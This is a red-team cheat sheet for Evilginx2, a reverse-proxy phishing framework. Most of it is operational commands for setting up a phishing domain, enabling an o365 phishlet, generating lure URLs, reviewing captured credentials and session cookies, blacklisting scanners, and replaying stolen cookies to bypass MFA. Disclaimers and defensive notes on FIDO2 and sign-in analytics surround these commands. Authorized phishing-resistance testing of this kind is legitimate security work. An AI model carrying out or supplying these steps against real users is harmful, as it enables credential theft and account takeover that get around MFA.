← All cheat sheets

EVILGINX2

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

Evilginx2 is a man-in-the-middle reverse-proxy framework used in
AUTHORIZED red-team / phishing-resistance assessments. It proxies a
real login page and captures credentials and SESSION TOKENS/cookies,
demonstrating why legacy MFA can be bypassed. Use only under signed
authorization and awareness-program rules of engagement.

CONCEPT#

# Victim -> evilginx (reverse proxy) -> real site
# Captures username, password, AND the post-MFA session cookie
# The stolen session cookie can bypass MFA (the tested weakness)
# Phishing-resistant MFA (FIDO2/WebAuthn, token binding) defeats this -
# which is the core lesson these engagements deliver

CORE CONCEPTS#

# phishlet  - YAML config mimicking a target site (proxy rules)
# lure      - a generated phishing URL tied to a phishlet
# session   - captured tokens/creds for a caught victim

SERVER / DNS SETUP#

evilginx                                        # Start (interactive)
> config domain <yourdomain.com>                # Base domain (you own it)
> config ipv4 <server-ip>                        # Public IP
# Point DNS A / wildcard records for the domain at the server first

PHISHLETS#

> phishlets                                       # List available phishlets
> phishlets hostname <name> login.yourdomain.com # Set the hostname
> phishlets enable <name>                          # Enable (fetches TLS cert)
> phishlets disable <name>
> phishlets get-hosts <name>                       # DNS records to create

LURES#

> lures                                            # List lures
> lures create <phishlet>                          # Create a lure
> lures get-url <id>                               # Get the phishing URL
> lures edit <id> redirect_url https://real.site  # Post-capture redirect
> lures edit <id> template <file>                  # Landing template
> lures delete <id>

SESSIONS (CAPTURED DATA)#

> sessions                                         # List caught sessions
> sessions <id>                                    # Show creds + cookies
# Export the session cookie and import into a browser to demonstrate
# the MFA-bypass impact in the report (do NOT access data beyond RoE)

CONFIG / OPSEC#

> config redirect_url https://www.corp.lu         # Default redirect
> blacklist <mode>                                 # Block scanners/bots
> config gophish ...                                # GoPhish integration
# Blacklisting reduces exposure to crawlers during a live test window

EXAMPLES#

# Minimal setup: domain, IP, phishlet, lure
evilginx
> config domain phish-test.example
> config ipv4 203.0.113.10
> phishlets hostname o365 login.phish-test.example
> phishlets enable o365
> lures create o365
> lures get-url 0

# Review a captured session to evidence MFA-session bypass in the report
> sessions
> sessions 1

NOTES#

- STRICTLY authorized use: named scope, signed authorization, defined
  test window, and data-handling rules - this tool captures real creds
- The deliverable is a LESSON: legacy OTP/push MFA is phishable;
  recommend FIDO2/WebAuthn phishing-resistant MFA + conditional access
- Do not access or exfiltrate victim data beyond proving the session
  works; destroy captured creds/cookies at engagement close
- Ties directly to your phishing-detection work (OpenClaw) and the
  ENTRA-ID / conditional-access review angle
- Detection/defence: impossible-travel + new-device sign-in analytics,
  token-binding, and user-agent/geo anomalies (see SENTINEL-KQL.txt)
- Pairs with GOPHISH (campaign delivery) and SOCIAL-ENGINEERING sheets